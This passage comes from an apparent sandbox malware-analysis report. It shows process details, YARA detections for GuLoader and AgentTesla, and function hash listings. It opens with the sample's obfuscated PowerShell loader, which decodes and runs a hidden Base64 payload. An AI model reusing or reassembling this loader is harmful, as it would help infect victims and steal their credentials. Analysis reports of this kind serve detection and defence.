($Skotskterr01) (Propje9 'AracIPyrim MicpAedioIntrrhellt Opr- ToaM SkyoAflvdMugwu GarlPuckeFitt DigtB TapiBekltSprnsFrysTUgleranveaMonon Nons Ellfelece Avlr Skk ') ;$Ratioeravi2=$Ratioeravi2+'\blyantss.Ned';while (-not $Badehusesv) { .($Skotskterr01) (Propje9 'Helo$CleaBSiksaSigtdSlouetrikhDespuDogtsSgepeRorisSerovVand=Pssi(TrouTdemoeKortsTrant Teg-FjerPRetua RectDuleh fer Opfr$UnvaRMicraovert BeviSerioVille SqurVashaSerrvHeteiPalm2Nonl)Indi ') ; . ($Skotskterr01) $Skotskterr00; . ($Skotskterr01) (Propje9 'micrS WootOutgaHepar LibtBela-GtzsS BunlAdkoeOpdrePythpSolv Brod5Ecth ');} & ($Skotskterr01) (Propje9 'Unde$stemPLevorEpopoOvnhpBanajKegleLege Rrte= The KidlGPoneeSuprtAdmi- skaCFresoResenGudetTeodeBorsn Tavt Tyk Miap$CardRCursahydrt LociNanzoUndeeDeakrTegnaInvevsampi Dev2 Pat '); . ($Skotskterr01) (Propje9 'Vkke$ReceBDrvloMiddlNedtdPicksOblipOccliPrel Sint=Dair Lim[ AugSVipsy UndsBasitbaggeSpenmSkrm.VidoCDustoTamtn SkjvIlsaeForprPebbt Slu] Nor:Cata:AdmiFLambr SudoGaramaftaBAmataRendsSkoceSmel6anel4SibeSForntMonorAquaiWharnMiddgSikk(Iken$GldsPExosrRopeoKvlspMultjBerteunim)Tros '); & ($Skotskterr01) (Propje9 'Hngs$AxedSParakSpiloUnintKrydsMillkPukrtaquoe TabrTurarImpl2Puck Vrim=tran Smit[DiscSSekuyVamps InitSkuleMegam Sku.KidnT Oble deix OdotOrty.AntiESwagnvexecFaktoGrifdMartiNonhn undgAnti]Brug:Vels:ElleA epiSEvodCAgraISuppIUnna.AndrGDoweeJudatOlieSHypot OborNonaiStyrn AergSpil( Fly$ForsB BlooFamilExpedCharsUndepAraciBago)Cyke '); .($Skotskterr01) (Propje9 'Hist$MandAZigzmStyroTdrarTypo=Four$ OveS Merkbicoo SvetGunssRadbk ColtLavteIschrDobbrForh2Adva.Encysplejuspukb KomsDeuttIronrunifiUnwinMonogForz(Mons2 Cre5Raad6Taal3Repa1Anve1Cata,Utru2Lign8Spal4 Voy3Lysi0Synd)Bobs '); & ($Skotskterr01) $Amor;}
                                      Imagebase:0x40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1956924821.0000000008B90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1945999546.0000000005E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1957028121.000000000B3A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:09:03:12
                                      Start date:26/10/2023
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                      Imagebase:0xdb0000
                                      File size:108'664 bytes
                                      MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2774546567.00000000204E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2774546567.00000000204E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FFE7DE59C83 Relevance: .2, Instructions: 201COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f90b5925b9ffa99efaec1e4dc75ea8f39660bd8cb213aa7adfcff870431f458c
                                        • Instruction ID: ef5c55bc88e98a2ecca70f27ec7e745d4c9d122a557a7218ae38526a067a7b09
                                        • Opcode Fuzzy Hash: f90b5925b9ffa99efaec1e4dc75ea8f39660bd8cb213aa7adfcff870431f458c
                                        • Instruction Fuzzy Hash: B161C330918A4D8FEBA5DF28CC457E977E1FF58310F14426EE85EC32A1DB3898458B82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE55047 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e5d78ee436618cf9220d4271dda7248cd2629f84c09a2286163611b7d46b5171
                                        • Instruction ID: e01359f7a5e3a023b2f5370212aae978435d944eb0dbe99204e589755ad15bc4
                                        • Opcode Fuzzy Hash: e5d78ee436618cf9220d4271dda7248cd2629f84c09a2286163611b7d46b5171
                                        • Instruction Fuzzy Hash: 8E217E31A1894D8FDF94EF58C845EEDB7A1FF68350F54026AE40AD7295DA24EC81CBC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE5B9AA Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0fbc9bc54f666295df76506893a4cc9cf940adcec2b48b06a628a58a77f7a997
                                        • Instruction ID: 1784b66144cb8f3c035bd5656e1410fb5b014f5fc138028df2d1fbc19fb36c44
                                        • Opcode Fuzzy Hash: 0fbc9bc54f666295df76506893a4cc9cf940adcec2b48b06a628a58a77f7a997
                                        • Instruction Fuzzy Hash: FA216F31A1C94D8FDF95EF58C845EAC7BA1FF58350F140166D40ED7296DA24E882CBC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE54235 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa9e92d57bb2d9103e28dd38b45251e690ef71956b224783e64b5de0fe5d0258
                                        • Instruction ID: 92d9ff4b1962e616415e4f25b46edc75e9c551e7b11f4c80c1af573c504ccee2
                                        • Opcode Fuzzy Hash: fa9e92d57bb2d9103e28dd38b45251e690ef71956b224783e64b5de0fe5d0258
                                        • Instruction Fuzzy Hash: 34215131A1894D8FDF95EF58C845EEDB7E1EF68314F240166D40AD7296DA24EC82CBC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE5B13F Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2d7ddd49b475c4897ab4f3740d490451216aa633cf26a3ec48c266cc1409622
                                        • Instruction ID: 966a9bd4ac0a544543454b68b2fd75a55876711470ede5939ae421724c1d503e
                                        • Opcode Fuzzy Hash: d2d7ddd49b475c4897ab4f3740d490451216aa633cf26a3ec48c266cc1409622
                                        • Instruction Fuzzy Hash: ED21F623A5C68A4FE7769F2CADA22E97BD0DF4227870803F6D4DA8E0E3FC1564074145
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE5AB26 Relevance: .1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68ce415c3985bf2c3cade748b80f568005d8bec5c47194de87727f9ce32ff69c
                                        • Instruction ID: 60f6a2a556bed9f3d1b6bebb0b1020c0ceef94566e43c93112b0bd6c3f58cd05
                                        • Opcode Fuzzy Hash: 68ce415c3985bf2c3cade748b80f568005d8bec5c47194de87727f9ce32ff69c
                                        • Instruction Fuzzy Hash: 87314930518B8C8FEB75DF28C8957D97BE1FB98310F14466AE84DC7265CB38A945CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE54AD5 Relevance: .1, Instructions: 82COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 452873ec74802379a7e95e800c0de744015166a49aca14d8109e2b129e1b27c6
                                        • Instruction ID: 5e07a0a978139892e06c3552c9932d943e3a5378eb7bd0ed46d97e0e5bf4ccfc
                                        • Opcode Fuzzy Hash: 452873ec74802379a7e95e800c0de744015166a49aca14d8109e2b129e1b27c6
                                        • Instruction Fuzzy Hash: 78213D31A1894D8FDF95EF58C841EEDB7A1FF58304B1401AAD40AD72A6DA24EC81CBC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE5AAE4 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b060d0c67f8a32ec7397047002b46125130e4008e17c5d3e1aafe498dd81919
                                        • Instruction ID: 96fe8c01777d552f891f5fdec565bf2bae1ceb2cf4a9344a22981e98fe4b2ea0
                                        • Opcode Fuzzy Hash: 7b060d0c67f8a32ec7397047002b46125130e4008e17c5d3e1aafe498dd81919
                                        • Instruction Fuzzy Hash: 32314B30518A8C8FEBB5DF18C885BD97BE1FB98350F54435AE84DC3266DA74A944CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE56015 Relevance: .1, Instructions: 66COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f464fe4dd27c546f3808a6f97f2091484375f95a6cbd476a69516d161571381
                                        • Instruction ID: 7247a86de155fa8db2ca4e42001a73c9a0094f93b731c6aa74996f598dd41412
                                        • Opcode Fuzzy Hash: 7f464fe4dd27c546f3808a6f97f2091484375f95a6cbd476a69516d161571381
                                        • Instruction Fuzzy Hash: 8611D871A1894D8FDF95EF48C881EEDB7B1EF68310F544269E40AD72A1DA24E881CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE5B099 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c7f567832503d7d68718940fb9c3e54439ef1631297f77639f7e618eb6e214d
                                        • Instruction ID: cb4ec0180dc4adba7e8765c1209e0c41794b6eabece21818209badae49f849d1
                                        • Opcode Fuzzy Hash: 8c7f567832503d7d68718940fb9c3e54439ef1631297f77639f7e618eb6e214d
                                        • Instruction Fuzzy Hash: 5801863161CB448FDB58DB1CE451A79B7E1FB99361F10062EE0CAC32A1D626E842C746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE53475 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction ID: 54e6436f03da6bfe4431272220a94a08f05efb0b2a4b2979bd4c98e38491f114
                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction Fuzzy Hash: 8D01677111CB0C4FD754EF0CE451AA5B7E0FB95364F10056EE58AC3665D636E881CB45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE5B686 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27f08a17f1cefb85306188f00b9de4dde89573e3acfe49535e86408dd3caf388
                                        • Instruction ID: 1b661d64e6a1eca2c8afd6eabe7cfd1ac1d5c94a4bfe65e681e67daf59df8e6d
                                        • Opcode Fuzzy Hash: 27f08a17f1cefb85306188f00b9de4dde89573e3acfe49535e86408dd3caf388
                                        • Instruction Fuzzy Hash: 42F0C832B2CA404FEB68D61CFC529B4B7D1EB55360754057ED08BC3692F916F8438781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE54D1C Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b800a38d0c6e98b61a447737c1600eb21ce4f4022dc31752ff21aeeffba7c31d
                                        • Instruction ID: 316ca7010ee2569f1d2ac4fcb6ae9a4de5929e8d82c992a6c0524f84ec4fbf9d
                                        • Opcode Fuzzy Hash: b800a38d0c6e98b61a447737c1600eb21ce4f4022dc31752ff21aeeffba7c31d
                                        • Instruction Fuzzy Hash: F7F0683272CB458FDBACDA1CE84157573D1EBD5361F10063EF08BC76A6EA26E8428745
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE53B1E Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c6510efc104e84b9cff824db7898f56e99ce6648edd0c5197b96b00b4c3b2e11
                                        • Instruction ID: 3bd3e715d505be5026c8799fda613e4642c165444300082dd807a75ba870c6bc
                                        • Opcode Fuzzy Hash: c6510efc104e84b9cff824db7898f56e99ce6648edd0c5197b96b00b4c3b2e11
                                        • Instruction Fuzzy Hash: 2FF0BB32B2C6048FDBAC9A0CF84157473D1E799325B10013EE44FC3296E926EC42C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE5B0AA Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 603a9e25ec8c8cca7fe119f8dde2eec3cc8d1bed297e97cb7eb1b79c5b10264a
                                        • Instruction ID: cee024780dd9501288ebf354dea7454b39c93af6895eb216c9b1473611b351ac
                                        • Opcode Fuzzy Hash: 603a9e25ec8c8cca7fe119f8dde2eec3cc8d1bed297e97cb7eb1b79c5b10264a
                                        • Instruction Fuzzy Hash: 42F0687160C7444FCB58DB1CE452969B7E0EB95334F04065FF0C6C7692D626E482CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE5440F Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1a3cba00bba078299913d9e343a3b9fff5a7aedf35435e6f9b4882638ae3070
                                        • Instruction ID: 7d7f2084e9d6c5dc7b648fbd2e5dc9e0c8b9e8c48c3c649fdb652a7bdadba3e0
                                        • Opcode Fuzzy Hash: d1a3cba00bba078299913d9e343a3b9fff5a7aedf35435e6f9b4882638ae3070
                                        • Instruction Fuzzy Hash: B4F0A73270C90C0BA70CA61CB8564F8B7C1CB95361B00437FF44AC6657EC17AC8342C6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE5B6A3 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d21270ee2265e48ddc51c9f6daf02d8e4760b53d2fd6e26a122651c38d8252b2
                                        • Instruction ID: 104d8278a6bbd099e32885ca0d40cf1cb5c3daf0bc5008f454b740cb063dfeaf
                                        • Opcode Fuzzy Hash: d21270ee2265e48ddc51c9f6daf02d8e4760b53d2fd6e26a122651c38d8252b2
                                        • Instruction Fuzzy Hash: C6F01C3275CA055BDB08A61DF8429F4B3E4EB96731710452FE487C2A52D927F8938AC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE54D2E Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07d518dae2a1cddcf6de0e5677a90a5fae943bc26edc78056abee3e8d0c78375
                                        • Instruction ID: ee0e32e6c60f643f6650931781e426da3f9608ae50695dc4f726e0f63ff7cb6c
                                        • Opcode Fuzzy Hash: 07d518dae2a1cddcf6de0e5677a90a5fae943bc26edc78056abee3e8d0c78375
                                        • Instruction Fuzzy Hash: 07F0543271CB444FDB58EB1CF4429B9B3D1EB95334F00062EF08BC76A6D926E8428645
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE7DE53B30 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2153974151.00007FFE7DE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffe7de50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ed67928c0c100ab9a23f56c286a2377e630bc53b82ade76ea8819d59bab70ad
                                        • Instruction ID: c404b29f60bf08bb20bbfdcac67d261d0a917ddaea3e4dbbcdaca6734aa785b0
                                        • Opcode Fuzzy Hash: 2ed67928c0c100ab9a23f56c286a2377e630bc53b82ade76ea8819d59bab70ad
                                        • Instruction Fuzzy Hash: 74F0A03271C6044FDB0CAA1CF8429B9B3E1EB89320B00016EE48BC2693EC26E8428685
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 078B6460 Relevance: 74.8, Strings: 58, Instructions: 2257COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (fgl$(fgl$(fgl$(fgl$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$84el$84el$84el$84el$84el$84el$84el$84el$84el$84el$TQp$TQp$TQp$XRp$XRp$XRp$tPp$tPp$tPp$tPp$tPp$tPp$tPp$tPp$tPp$tPp$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                                        • API String ID: 0-1146558415
                                        • Opcode ID: dbee7489b3118ec3196414ae9b34e2980f5a89756528cecd7f6c60af9d998f0b
                                        • Instruction ID: e23992c531dd7ecaba49f9ce2a76ba12cf6c26747124cdcb793b6cb6affe43ae
                                        • Opcode Fuzzy Hash: dbee7489b3118ec3196414ae9b34e2980f5a89756528cecd7f6c60af9d998f0b
                                        • Instruction Fuzzy Hash: CE03B2B1B00306DFDB24DF68C4546EABBA2AFD9314F28846AD805DB391DB71DC41CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8C8D8 Relevance: .3, Instructions: 281COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b03ca641c5e4260f7f0adfecb468e90aade226f492431b6d9e73fc4f755cb9f
                                        • Instruction ID: 71f1dbf9aeafc89e9710140b33956135e1b2f1a204b39a2fbb1c68dd4a32cec7
                                        • Opcode Fuzzy Hash: 0b03ca641c5e4260f7f0adfecb468e90aade226f492431b6d9e73fc4f755cb9f
                                        • Instruction Fuzzy Hash: 02B15E70E006099FDB14DFA9C885BADBBF2FF88324F14852DD815A7294EB74A845CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8D1A8 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b93bbaf84487760e599fc6b615528afa78de3429f7066fc3ae153b769ae73183
                                        • Instruction ID: 5f623e7e370d64a8fe25a592d238c6ee6f0ae50c44a2241992e09eb4ac1df4fd
                                        • Opcode Fuzzy Hash: b93bbaf84487760e599fc6b615528afa78de3429f7066fc3ae153b769ae73183
                                        • Instruction Fuzzy Hash: 9AB14D70E002099FDB14EFA9D8817EDBBF2FF88314F14852DD815AB294EB74A845CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B9638 Relevance: 10.7, Strings: 8, Instructions: 703COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 84el$84el$84el$84el$tPp$tPp$tPp$tPp
                                        • API String ID: 0-520965650
                                        • Opcode ID: 3a7ba81a162fc8b4d393ff648366cee8fdbd85e7a24875f30b37f8b1b14f1fe3
                                        • Instruction ID: cf58bcdf2a012cbfc6cb0fddbb8c32393ebc552e861272370a79b6891e6fd2e7
                                        • Opcode Fuzzy Hash: 3a7ba81a162fc8b4d393ff648366cee8fdbd85e7a24875f30b37f8b1b14f1fe3
                                        • Instruction Fuzzy Hash: 2F42E870700205DFCB24DF68C4417AABBE2EF99310F1484AAE959DB391DB71EC51CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A8F4C8 Relevance: 5.5, Strings: 4, Instructions: 543COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Hp$Hp$Hp$Hp
                                        • API String ID: 0-749838615
                                        • Opcode ID: b6d337d5240bcf9c785148b4fdec0b1689d51d6f39ab2e375b807904547b351b
                                        • Instruction ID: 0cd737c578c73bcb90aaca873e6498727bc4e0115fdcb27d34a2b7df782f6963
                                        • Opcode Fuzzy Hash: b6d337d5240bcf9c785148b4fdec0b1689d51d6f39ab2e375b807904547b351b
                                        • Instruction Fuzzy Hash: 89129174B003059FEB14EBA4D8557AEBBB6EBC8700F20442DE455AB794DF38AD02CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04A88DE0 Relevance: 4.3, Strings: 3, Instructions: 523COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1941702138.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_4a80000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Hp$$p$$p
                                        • API String ID: 0-1460534024
                                        • Opcode ID: df0307985f96c18032c1b9e766ba71976b6d9c6031ebc6b7f0919ad4bd8e1aaa
                                        • Instruction ID: d1b17f2e5459ceafd3189a3109c55a7e858597a4dfd56e7ec9053ae454e857a3
                                        • Opcode Fuzzy Hash: df0307985f96c18032c1b9e766ba71976b6d9c6031ebc6b7f0919ad4bd8e1aaa
                                        • Instruction Fuzzy Hash: F3222234B002149FDB29EB64C8547AEBBB6EF89704F1445ADD40AAB361DF35AE45CF80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B961D Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
